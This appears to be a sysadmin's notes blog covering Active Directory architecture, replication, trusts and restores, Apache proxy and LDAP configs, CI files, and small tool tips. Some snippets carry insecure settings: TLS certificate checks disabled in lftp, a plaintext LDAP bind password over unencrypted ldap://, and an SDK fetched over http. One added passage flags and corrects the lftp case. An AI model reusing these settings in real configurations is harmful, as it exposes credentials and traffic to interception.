<li>SID: the object's security identifier; only security principals have one. It is made of the identifier of the domain the object belongs to, followed by the relative identifier (RID) of the object within that domain.</li>
</ul>
<p>The schema references:</p>
<ul>
<li>every available object class</li>
<li>for each class, the attributes that may or must be populated</li>
<li>the list of attributes and their characteristics</li>
</ul>
<p>Version number: every directory object has an update sequence number (USN), stored as the value of the uSNChanged attribute. Each attribute also carries its own version number. This is what lets attribute changes be replicated to the other domain controllers.</p>
<h2>Organization of directory data</h2>
<p><img alt="" src="https://img.nlegall.fr/8zIMUkfH"></p>
<p>Domain controllers hold a copy of the AD database and a file share:</p>
<ul>
<li><code>C:\Windows\NTDS</code> for the AD database</li>
<li><code>C:\Windows\SYSVOL</code>, which holds the SYSVOL share</li>
</ul>
<table>
<thead>
<tr>
<th>File</th>
<th>Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ntds.dit</td>
<td>The AD database file</td>
</tr>
<tr>
<td>Edb.log</td>
<td>Log file of the transactions in progress</td>
</tr>
<tr>
<td>Edb*.log</td>
<td>Additional transaction log files</td>
</tr>
<tr>
<td>Edb.chk</td>
<td>Database checkpoint file</td>
</tr>
<tr>
<td>Edbres00001.jrs</td>
<td>Reserved disk space file</td>
</tr>
<tr>
<td>Edbres00002.jrs</td>
<td>Reserved disk space file</td>
</tr>
</tbody>
</table>
<blockquote>
<p>Except as part of a documented procedure, avoid handling these files directly. They are manipulated through dedicated tools.</p>
</blockquote>
<p>The AD database is managed by its ESE (Extensible Storage Engine) engine.</p>
<p>ESE diagram</p>
<p>The SYSVOL folder is present on every domain controller. It contains the policies folder (the GPT part of group policies and the ADM files for all group policies) and the scripts folder (user logon scripts).</p>
<h2>Logical organization of the data</h2>
<p><img alt="" src="https://img.nlegall.fr/STDdFSXV"></p>
<table>
<thead>
<tr>
<th>Partition name</th>
<th>Content</th>
<th>Replication scope</th>
</tr>
</thead>
<tbody>
<tr>
<td>Domain</td>
<td>Contains the domain's objects, usually managed from the Active Directory Users and Computers console</td>
<td>Domain</td>
</tr>
<tr>
<td>Configuration</td>
<td>Contains the configuration information of the domain services</td>
<td>Forest</td>
</tr>
<tr>
<td>Schema</td>
<td>Contains the AD database schema, that is the characteristics of object classes and attributes</td>
<td>Forest</td>
</tr>
</tbody>
</table>
<h2>Global catalog</h2>
<p><em>Every domain must contain a global catalog.</em></p>
<p>It holds every object in the forest, but only a limited set of attributes for each. These objects are read-only.</p>
<p>Use cases: searching for objects across the forest, User Principal Name (UPN) resolution, universal groups, global address lists (Exchange)</p>
<p>Why add one:</p>
<ul>
<li>In a multi-domain context, to make it easier to search for objects outside the local domain</li>
<li>Applications that frequently need attributes of objects from other domains</li>
</ul>
<p>Limit to adding one: it impacts every GC server in the forest (additional replication load)</p>
<p>Single-domain context:</p>
<ul>
<li>Single site: the GC should be placed on every domain controller</li>
<li>Multiple sites: if a controller sits on another site behind a slow link, enable universal group membership caching instead</li>
</ul>
<p>Multiple domains and sites: one GC server is needed per site if:</p>
<ul>
<li>An application requires a global catalog</li>
<li>There are more than 100 users</li>
<li>A slow link connects one of the sites to the GC</li>
<li>Performance problems are observed</li>
<li>A large number of users use roaming profiles</li>
</ul>
<h1>Installing and configuring AD domains</h1>
<h2>Definitions</h2>
<table>
<thead>
<tr>
<th>Term</th>
<th>Definition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Configuration tools</td>
<td>RSAT, Server Manager, MMC, PowerShell</td>
</tr>
<tr>
<td>Functional levels</td>
<td>Features enabled within a domain or a forest. Also define the minimum operating system that can host the AD role. Two levels: forest and domain</td>
</tr>
<tr>
<td>Operations masters</td>
<td>FSMO roles: schema master, domain naming master, RID master, infrastructure master and PDC emulator</td>
</tr>
<tr>
<td>RODC</td>
<td>Read Only Domain Controller. No change can be pushed from it</td>
</tr>
</tbody>
</table>
<h2>Tools and services</h2>
<ul>
<li>ADAC (Active Directory Administrative Center): built entirely on PowerShell and shows the history of the commands it ran.</li>
<li>ADSI Edit: LDAP editor used to display or modify the attribute values of objects</li>
<li>Active Directory Schema: to display or modify object classes or attributes</li>
</ul>
<h2>Command line</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td>dcdiag</td>
<td>Domain controller diagnostics</td>
</tr>
<tr>
<td>netdom</td>
<td>Account and trust relationship management tool</td>
</tr>
<tr>
<td>nltest</td>
<td>Tests and diagnostics in a domain context</td>
</tr>
<tr>
<td>ntdsutil</td>
<td>Domain controller and AD management and maintenance</td>
</tr>
<tr>
<td>repadmin</td>
<td>Replication diagnostics and actions</td>
</tr>
<tr>
<td>w32tm</td>
<td>Windows Time service management</td>
</tr>
</tbody>
</table>
<h2>Functional levels</h2>
<table>
<thead>
<tr>
<th>Domain functional level</th>
<th>Domain controller versions allowed in the domain</th>
</tr>
</thead>
<tbody>
<tr>
<td>2000 mixed</td>
<td>NT 4 / 2000 / 2003 / 2003 R2</td>
</tr>
<tr>
<td>2000 native</td>
<td>2000 / 2003 / 2003 R2 / 2008 / 2008 R2</td>
</tr>
<tr>
<td>2003</td>
<td>2003 / 2003 R2 / 2008 / 2008 R2 / 2012 / 2012 R2</td>
</tr>
<tr>
<td>2008</td>
<td>2008 / 2008 R2 / 2012 / 2012 R2</td>
</tr>
<tr>
<td>2008 R2</td>
<td>2008 R2 / 2012 / 2012 R2</td>
</tr>
<tr>
<td>2012</td>
<td>2012 / 2012 R2</td>
</tr>
<tr>
<td>2012 R2</td>
<td>2012 R2</td>
</tr>
</tbody>
</table>
<p>Forest functional levels carry the same names (2000, 2003, 2008, 2008 R2, 2012, 2012 R2). A forest can only be raised to a given level once every domain in it is at least at that level.</p>
<h2>RODC</h2>
<ul>
<li>Replication is one-way, towards it only</li>
<li>Specific user accounts can be targeted so that their passwords are cached on it</li>
<li>It has a local Administrator account</li>
<li>Its replication partners must run WS2008 or later</li>
<li>The domain can be prepared with the adprep utility</li>
</ul>
<h2>Operations masters</h2>
<table>
<thead>
<tr>
<th>Role name</th>
<th>Scope of uniqueness</th>
<th>Details</th>
</tr>
</thead>
<tbody>
<tr>
<td>Domain naming master</td>
<td>The forest</td>
<td>Controls the addition and removal of domains in the forest</td>
</tr>
<tr>
<td>Schema master</td>
<td>The forest</td>
<td>Only controller with write access to the schema</td>
</tr>
<tr>
<td>PDC emulator</td>
<td>The domain</td>
<td>Handles password and GPO updates, time source for the DCs</td>
</tr>
<tr>
<td>Infrastructure master</td>
<td>The domain</td>
<td>Cross-domain object references</td>
</tr>
<tr>
<td>RID master</td>
<td>The domain</td>
<td>Allocates RID pools to each DC (used to build SIDs)</td>
</tr>
</tbody>
</table>
<p>Initially, the first domain controller of the forest root domain holds all of the roles.</p>
<h2>Recommendations</h2>
<table>
<thead>
<tr>
<th>Roles</th>
<th>Placement</th>
</tr>
</thead>
<tbody>
<tr>
<td>Schema master and domain naming master</td>
<td>Preferably on the same controller</td>
</tr>
<tr>
<td>PDC emulator and RID master</td>
<td>Preferably on the same controller</td>
</tr>
<tr>
<td>Infrastructure master</td>
<td>Multiple domains: must not sit on a GC (unless every DC is a GC) - Single domain: not used</td>
</tr>
</tbody>
</table>
<h2>Installation planning</h2>
<h2>Domain boundary</h2>
<ul>
<li>Administrative boundary</li>
<li>Policy application boundary</li>
<li>Audit, password and account policy boundary</li>
<li>Replication of the domain partition</li>
<li>Replication of the domain's DNS zones</li>
</ul>
<h2>Forest boundary</h2>
<ul>
<li>Security boundary</li>
<li>Replication boundary for the schema, the configuration and the GC</li>
<li>Replication of the forest's DNS zones</li>
</ul>
<h2>Reasons for multiple domains</h2>
<ul>
<li>Limit replication to avoid loading site links</li>
<li>DNS namespace constraints</li>
<li>Different delegation or administration constraints</li>
</ul>
<h2>Reasons for multiple forests</h2>
<ul>
<li>Security isolation</li>
<li>Administrative isolation</li>
<li>Incompatible schemas</li>
</ul>
<h2>adprep</h2>
<table>
<thead>
<tr>
<th>Switch used</th>
<th>Controller on which to run the command</th>
</tr>
</thead>
<tbody>
<tr>
<td>/forestprep</td>
<td>The schema master</td>
</tr>
<tr>
<td>/domainprep</td>
<td>The infrastructure master</td>
</tr>
<tr>
<td>/rodcprep</td>
<td>No particular one</td>
</tr>
</tbody>
</table>
<h1>Active Directory replication</h1>
<h2>Overall operation</h2>
<table>
<thead>
<tr>
<th>Replication type</th>
<th>Operating characteristics</th>
<th>Topology generator</th>
</tr>
</thead>
<tbody>
<tr>
<td>Intrasite</td>
<td>Direct links - Short delays</td>
<td>KCC: Knowledge Consistency Checker</td>
</tr>
<tr>
<td>Intersite</td>
<td>Several networks - Delays depend on the links - Scheduled</td>
<td>ISTG: InterSite Topology Generator</td>
</tr>
</tbody>
</table>
<ul>
<li>Network communication must work between the domain controllers of the same network</li>
<li>Replication relies on a routed infrastructure: the different networks must be connected to each other</li>
<li>Since authentication uses Kerberos, the clock skew between controllers should ideally be zero, and in any case minimal (less than 5 minutes, the default Kerberos tolerance)</li>
<li>Name resolution and the DNS service must be working</li>
</ul>
<h2>Replication services</h2>
<table>
<thead>
<tr>
<th>OS</th>
<th>Default service</th>
<th>Available service</th>
</tr>
</thead>
<tbody>
<tr>
<td>2000</td>
<td>NTFRS</td>
<td>-</td>
</tr>
<tr>
<td>2003</td>
<td>NTFRS</td>
<td>-</td>
</tr>
<tr>
<td>2008</td>
<td>NTFRS</td>
<td>DFSR</td>
</tr>
<tr>
<td>2012</td>
<td>DFSR</td>
<td>-</td>
</tr>
</tbody>
</table>
<h2>AD site</h2>
<ul>
<li>AD replication</li>
<li>Client workstations use it to authenticate and request AD services from a nearby controller</li>
<li>Other services such as Exchange and DFS</li>
<li>GPO linking</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="c"># Site a controller belongs to</span>
<span class="nb">Get-ADReplicationSite</span>
</code></pre></div>
<h2>Link types</h2>
<table>
<thead>
<tr>
<th>Protocol</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>IP</td>
<td>Synchronous - Replicates every directory partition</td>
</tr>
<tr>
<td>SMTP</td>
<td>Asynchronous - Cannot replicate the domain partition</td>
</tr>
</tbody>
</table>
<h2>Topology</h2>
<h2>If there are fewer than 7 DCs</h2>
<p><img alt="" src="https://img.nlegall.fr/cDqWkoqd"></p>
<h2>If there are more than 7 DCs</h2>
<p><img alt="" src="https://img.nlegall.fr/tYtYC47Q"></p>
<p><em>Only three hops are possible</em></p>
<h2>Intersite</h2>
<h2>ISTG</h2>
<p>In each AD site, one of the KCC services is designated ISTG (InterSite Topology Generator). It takes part in building the intersite replication topology: it designates the bridgehead server(s) per partition for its site and creates the connection objects between its site and the other partners.</p>
<ul>
<li>Transitive link: transfers go over the link with the lowest cost</li>
<li>Non-transitive link: transfers are point-to-point</li>
</ul>
<h2>Replication delays</h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Delay</th>
<th>Details</th>
</tr>
</thead>
<tbody>
<tr>
<td>Intrasite</td>
<td>One minute at most</td>
<td>Initial delay 15 s - delay between partners 3 s - 3 hops max</td>
</tr>
<tr>
<td>Intersite</td>
<td>15 min to 3 h</td>
<td>Polling interval 3 h by default (15 min recommended)</td>
</tr>
<tr>
<td>Urgent replication</td>
<td>No initial or retransmission delay</td>
<td>Lockout/password policy - RID master - LSA secret - account unlock <em>(intrasite only by default)</em></td>
</tr>
<tr>
<td>Password update replication</td>
<td>No delay towards the PDC - delay with retransmission to the others</td>
<td>Password changed on a DC</td>
</tr>
</tbody>
</table>
<h1>Trust relationships</h1>
<ul>
<li>Allow credentials to be used in a domain other than the one they come from</li>
<li>Domain controllers are involved in validating the logons</li>
<li>Three configuration levels: type, transitivity and direction</li>
</ul>
<h2>Terms</h2>
<ul>
<li>Trusted domain: the authentication (account) domain</li>
<li>Trusting domain: the resource domain</li>
<li>Incoming trust: users of the local domain can authenticate to the resources of the other domain</li>
<li>Outgoing trust: users of the other domain can authenticate to the resources of the local domain</li>
</ul>
<h2>Types</h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Direction</th>
<th>Transitivity</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Parent/child</td>
<td>Two-way</td>
<td>Yes</td>
<td>Created automatically with a child domain</td>
</tr>
<tr>
<td>Tree root</td>
<td>Two-way</td>
<td>Yes</td>
<td>Created automatically with a new tree in the forest</td>
</tr>
<tr>
<td>Shortcut</td>
<td>One-way or two-way</td>
<td>Yes</td>
<td>Between separate domains of the forest - shortens authentication paths</td>
</tr>
<tr>
<td>Forest</td>
<td>One-way or two-way</td>
<td>Yes, between the two forests only (not to a third forest)</td>
<td>Between forest root domains</td>
</tr>
<tr>
<td>External</td>
<td>One-way or two-way</td>
<td>No</td>
<td>Between domains of different forests</td>
</tr>
<tr>
<td>Realm (Kerberos)</td>
<td>One-way or two-way</td>
<td>Configurable</td>
<td>Towards non-Microsoft Kerberos realms</td>
</tr>
</tbody>
</table>
<p>From a security standpoint, a trust makes the trusting (resource) domain only as secure as the trusted (account) domain: whoever controls the trusted domain can authenticate to the trusting one. SID filtering, enabled by default on external and forest trusts, discards foreign SIDs carried in SID history to limit privilege escalation across the trust; disabling it should be a deliberate, documented decision.</p>
<h1>Directory services maintenance</h1>
<h2>Database management</h2>
<ul>
<li>Backup and restore</li>
<li>Online/offline defragmentation: online defragmentation is automatic (every 12 h by default) and optimizes the database but does not return free space to the file system; offline defragmentation, which does, is possible through a specific procedure</li>
<li>Creating and using snapshots: supported since 2008, through the <code>ntdsutil</code> command</li>
</ul>
<h2>MS tools</h2>
<ul>
<li>Since Windows 2008: wbadmin (GUI and CLI) and wbengine (service)</li>
<li>Local or network backup target</li>
<li>Backups in VHD and VHDX format can be mounted from Disk Management</li>
</ul>
<h2>DSRM boot</h2>
<h2>Non-authoritative restore</h2>
<p><img alt="" src="https://img.nlegall.fr/5VM75GFF"></p>
<ol>
<li>Boot the controller to restore in DSRM mode</li>
<li>Restore the AD database</li>
<li>Boot the controller in normal mode</li>
<li>Replication of the changes from the other controllers overwrites the restored data where it is older</li>
</ol>
<h2>Authoritative restore</h2>
<p>DIAGRAM</p>
<ol>
<li>Boot the controller to restore in DSRM mode</li>
<li>Restore the AD database</li>
<li>Mark the objects that must be authoritative</li>
<li>Select the NTDS instance</li>
<li>Select the context</li>
<li>Restore from the OU</li>
<li>Boot the controller in normal mode</li>
<li>Replicate the changes to the other controllers</li>
</ol>
<h2>Definitions</h2>
<table>
<thead>
<tr>
<th>Term</th>
<th>Definition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Tombstone object</td>
<td>Object transformed following a deletion request</td>
</tr>
<tr>
<td>Tombstone lifetime</td>
<td>Lifetime of a tombstone object (180 days on forests created with Windows Server 2003 SP1 or later, 60 days on older ones). A backup older than this must never be restored, since deletions it does not know about can no longer be replicated to it.</td>
</tr>
<tr>
<td>Garbage collection</td>
<td>Routine running locally on each domain controller. It purges the tombstone objects whose lifetime, given by the tombstoneLifetime attribute, has expired.</td>
</tr>
</tbody>
</table>
<h1>Apache2</h1>
<p><em>2018-11-24, nlegall, <a href="https://blog.nlegall.fr/apache2.html">https://blog.nlegall.fr/apache2.html</a></em></p>
<h2>Transmission proxy</h2>
<p>Files required for SSL and password protection (the certificate is self-signed and valid for 365 days; Basic authentication sends the password base64-encoded on every request, so it must only ever be exposed over TLS):</p>
<div class="highlight"><pre><span></span><code>openssl req -x509 -nodes -days <span class="m">365</span> -newkey rsa:4096 -out /etc/apache2/server.crt -keyout /etc/apache2/server.key
htpasswd -c /etc/apache2/.htpasswd user1
a2enmod proxy
a2enmod proxy_http
a2enmod ssl
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="nb">SSLEngine</span> <span class="k">on</span>
<span class="nb">SSLCertificateFile</span> <span class="sx">/etc/apache2/server.crt</span>
<span class="nb">SSLCertificateKeyFile</span> <span class="sx">/etc/apache2/server.key</span>
<span class="nt"><Location</span> <span class="s">/</span><span class="nt">></span>
<span class="nb">AuthType</span> Basic
<span class="nb">AuthName</span> <span class="s2">"Authentication Required"</span>
<span class="nb">AuthUserFile</span> <span class="s2">"/etc/apache2/.htpasswd"</span>
<span class="nb">Require</span> valid-user
<span class="nt"></Location></span>
<span class="nb">ProxyPass</span> / http://1.2.3.4:9091/
<span class="nb">ProxyPassReverse</span> / http://1.2.3.4:9091/
</code></pre></div>
<h2>Proxy ownCloud</h2>
<h2>LDAP/AD Authentication</h2>
<div class="highlight"><pre><span></span><code>a2enmod ldap authnz_ldap
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c">#vim /etc/apache2/sites-available/namesite.conf</span>
<span class="nb">AuthName</span> <span class="s2">"Put in your own prompt message"</span>
<span class="nb">AuthType</span> Basic
<span class="nb">AuthBasicProvider</span> ldap
<span class="nb">AuthLDAPUrl</span> <span class="s2">"ldap://cicntp12:389/DC=local,DC=lan?sAMAccountName?sub?(objectClass=*)"</span>
<span class="nb">Require</span> valid-user
<span class="nb">AuthLDAPBindDN</span> <span class="s2">"CN=Username,OU=Users,DC=local,DC=lan"</span>
<span class="nb">AuthLDAPBindPassword</span> password
</code></pre></div>
<h1>CI (Continuous Integration)</h1>
<p><em>nlegall, 2018-11-24</em></p>
<p><em>File name: <code>.travis.yml</code></em></p>
<h2>.NET</h2>
<div class="highlight"><pre><span></span><code><span class="nt">language</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">csharp</span>
<span class="nt">solution</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">solution.sln</span>
<span class="nt">install</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">sudo apt-get install -y gtk-sharp2</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">nuget restore solution.sln</span>
<span class="nt">addons</span><span class="p">:</span>
<span class="nt">sonarqube</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">true</span>
<span class="nt">env</span><span class="p">:</span>
<span class="nt">global</span><span class="p">:</span>
<span class="nt">secure</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">SONARQUBE_TOKEN_SECURE</span>
<span class="nt">script</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">xbuild /p:Configuration=Release solution.sln</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">sonar-scanner -Dsonar.login=$SONAR_TOKEN</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/FYNtjdU6"> Ionic</h1>
<div class="highlight"><pre><span></span><code><span class="nt">sudo</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">false</span>
<span class="nt">language</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">node_js</span>
<span class="nt">node_js</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="s">"0.12.2"</span>
<span class="nt">addons</span><span class="p">:</span>
<span class="nt">apt</span><span class="p">:</span>
<span class="nt">sources</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ubuntu-toolchain-r-test</span>
<span class="nt">packages</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">g++-4.8</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">openjdk-7-jdk</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">lib32stdc++6</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">lib32z1</span>
<span class="nt">env</span><span class="p">:</span>
<span class="l l-Scalar l-Scalar-Plain">CXX=g++-4.8</span>
<span class="nt">install</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">npm config set registry https://registry.npmjs.org/</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">npm install -g gulp bower cordova ionic</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">npm install</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">bower update</span>
<span class="nt">before_script</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">wget http://dl.google.com/android/android-sdk_r24.4-linux.tgz</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">tar -xvf android-sdk_r24.4-linux.tgz</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter platform-tools</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter build-tools-23.0.2</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter android-23</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter extra-android-support</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter extra-android-m2repository</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">echo y | ./android-sdk-linux/tools/android update sdk --no-ui --all --filter extra-google-m2repository</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">export ANDROID_HOME=$PWD/android-sdk-linux</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">export PATH=${PATH}:$ANDROID_HOME/tools:$ANDROID_HOME/platform-tools:$ANDROID_HOME/build-tools/23.0.2</span>
<span class="nt">script</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ionic platform remove android</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ionic platform add android</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ionic resources --icon</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">chmod +x hooks/after_prepare/010_add_platform_class.js</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">ionic build android</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/pFYMC2It"> Appveyor</h1>
<p>This service provides continuous integration for Visual Studio (.NET) projects.</p>
<h2>Configuration file</h2>
<p>The configuration file below installs all the NuGet packages required before the build, sends the unit test results to coveralls.io, and posts a notification to a Slack channel on the success or failure of the operation.</p>
<p>For more details, see the documentation for this file: https://www.appveyor.com/docs/.</p>
<p>Name: <code>appveyor.yml</code></p>
<div class="highlight"><pre><span></span><code><span class="nt">version</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">0.0.0.{build}</span>
<span class="nt">environment</span><span class="p">:</span>
<span class="nt">COVERALLS_REPO_TOKEN</span><span class="p">:</span>
<span class="nt">secure</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">uZr+CJU4Pl/9ySY0sDQh62xBZaqlEQB7s6fZEmG58InhSjbwslq6mKIWxd1Q55TO</span>
<span class="nt">platform</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">Any CPU</span>
<span class="nt">before_build</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">nuget restore SolutionName.sln</span>
<span class="nt">build</span><span class="p">:</span>
<span class="nt">project</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">SolutionName.sln</span>
<span class="c1"># Specifies the actions to run after Appveyor's automatic tests</span>
<span class="nt">after_test</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="nt">cmd</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">.\after_test.cmd</span>
<span class="c1">#---------------------------------#</span>
<span class="c1"># notifications #</span>
<span class="c1">#---------------------------------#</span>
<span class="nt">notifications</span><span class="p">:</span>
<span class="c1"># Slack</span>
<span class="p p-Indicator">-</span> <span class="nt">provider</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">Slack</span>
<span class="nt">incoming_webhook</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">https://hooks.slack.com/services/xxxxxx/yyyyyyyy/zzzzzzzzzz</span>
</code></pre></div>
<h1><img alt="" src="https://img.nlegall.fr/7Gu35eFm"> Coveralls</h1>
<p>To run unit tests from Visual Studio, you can use the NUnit framework (http://nunit.org/). It is currently the most widespread and widely used. The results of these tests can then be sent to Coveralls, which tracks them over time and provides a set of graphs.</p>
<p>To do so, install the following NuGet packages:</p>
<ul>
<li>NUnit</li>
<li>NUnitConsoleRunner</li>
<li>NUnit3TestAdapter</li>
</ul>
<p>The following two NuGet packages are used if you want to send the test results to coveralls.io:</p>
<ul>
<li>coveralls.net</li>
<li>OpenCover</li>
</ul>
<div class="highlight"><pre><span></span><code>nuget install NUnit.Runners -Version 3.4.1 -OutputDirectory tools
nuget install OpenCover -Version 4.6.519 -OutputDirectory tools
nuget install coveralls.net -Version 0.7.0 -OutputDirectory tools
.\tools\OpenCover.4.6.519\tools\OpenCover.Console.exe -target:.\tools\NUnit.ConsoleRunner.3.4.1\tools\nunit3-console.exe -targetargs:".\NUnitTest\bin\Debug\NUnitTest.dll" -register:user
.\tools\coveralls.net.0.7.0\tools\csmacnz.Coveralls.exe --opencover -i .\results.xml
</code></pre></div>
<h1>Miscellaneous</h1>
<p><em>nlegall, 2018-11-24</em></p>
<div class="highlight"><pre><span></span><code><span class="err">--Inform="General;%FileSize/String%"</span>
<span class="err">--Inform="Video;%BitRate/String%"</span>
<span class="err">--Inform="Audio;%BitRate/String%"</span>
</code></pre></div>
<h1>Optimization</h1>
<h2>PNG</h2>
<div class="highlight"><pre><span></span><code>apt install optipng
optipng -o <span class="m">7</span> *.png
</code></pre></div>
<h2>JPEG</h2>
<div class="highlight"><pre><span></span><code>apt install jpegoptim
jpegoptim *.jpg
</code></pre></div>
<h2>HTML / JS / CSS</h2>
<p>http://refresh-sf.com/</p>
<h2>Downloading videos</h2>
<p>youtube-dl: https://rg3.github.io/youtube-dl/</p>
<h1>FTP/TLS</h1>
<div class="highlight"><pre><span></span><code>apt install lftp
lftp -du user,password ftp.example.com
<span class="nb">set</span> ssl:verify-certificate no
</code></pre></div>
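The <code>set ssl:verify-certificate no</code> line in the session above accepts any certificate, so a host on the path can impersonate the FTP server and read the login and the transferred data. As an added example that is not part of the original post, here is an <code>~/.lftprc</code> fragment with the weak setting beside the corrected one; the CA bundle path is an assumption for a Debian-style system.

```conf
# ~/.lftprc  (added example, not from the original post; paths are assumptions)

# Weak, as in the session above: every certificate is accepted, so there is no
# way to tell the real server from one that intercepts the connection.
#set ssl:verify-certificate no

# Corrected: keep verification on and point lftp at the CA that signed the
# server certificate (the system bundle here; use the server's own CA file if
# it is private). The connection now fails instead of silently trusting an
# unknown certificate.
set ssl:verify-certificate yes
set ssl:ca-file /etc/ssl/certs/ca-certificates.crt

# Refuse to fall back to cleartext FTP and encrypt the data channel as well,
# not only the control channel.
set ftp:ssl-force yes
set ftp:ssl-protect-data yes
```

Keep the login in <code>~/.netrc</code> (mode 600) and run <code>lftp ftp.example.com</code> instead of <code>-u user,password</code>, so the password never appears in the process list or the shell history; note that <code>-d</code> in the original command enables debug output and is not a login option.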
<h1>Website checks</h1>
<p>https://www.htbridge.com/ssl/
https://spdycheck.org/
http://yellowlab.tools/</p>
<h1>Firefox</h1>
<h2>Screenshot</h2>
<p>Open the console: <code>Shift</code>+<code>F2</code></p>
<div class="highlight"><pre><span></span><code><span class="err">screenshot --clipboard --fullpage</span>
</code></pre></div>
<h1>SOCKS</h1>
<div class="highlight"><pre><span></span><code>wget https://sourceforge.net/projects/tsocks/files/latest/download -O tsocks
tar xzvf tsocks
<span class="c1"># the extracted directory is named after the tsocks version</span>
<span class="nb">cd</span> tsocks-*/
./configure
make
make install
<span class="c1"># printf, not echo: bash's echo does not expand \n without -e</span>
<span class="nb">printf</span> <span class="s2">"server = 192.168.0.1\nserver_type = 5\nserver_port = 1080\n"</span> > /etc/tsocks.conf
tsocks apt update
</code></pre></div>
<h1>Flexget</h1>
<p><em>nlegall, 2018-11-24</em></p>
<p><img alt="" src="https://img.nlegall.fr/DtJr1Van"></p>
<p>FlexGet is a multipurpose automation tool for content like torrents, nzbs, podcasts, comics, series, movies, etc. It can use different kinds of sources like RSS-feeds, html pages, csv files, search engines and there are even plugins for sites that do not provide any kind of useful feeds.</p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt install python-pip
pip install --upgrade setuptools
pip install flexget
</code></pre></div>
<h1>Configuration</h1>
<p>The first step is to add the crontab entry that runs flexget automatically at a set interval (here every 20 minutes).</p>
<div class="highlight"><pre><span></span><code><span class="err"># crontab -e</span>
<span class="err">*/20 * * * * /usr/local/bin/flexget --cron execute</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1"># .flexget/config.yml</span>
<span class="nt">tasks</span><span class="p">:</span>
<span class="nt">name task</span><span class="p">:</span>
<span class="nt">rss</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">http://path/to/rss</span>
<span class="nt">accept_all</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">yes</span>
<span class="nt">download</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">/home/user/watch</span>
<span class="nt">priority</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">1</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>flexget --test execute
</code></pre></div>
<h1>Plugins</h1>
<h2>Series</h2>
<h2>rTorrent</h2>
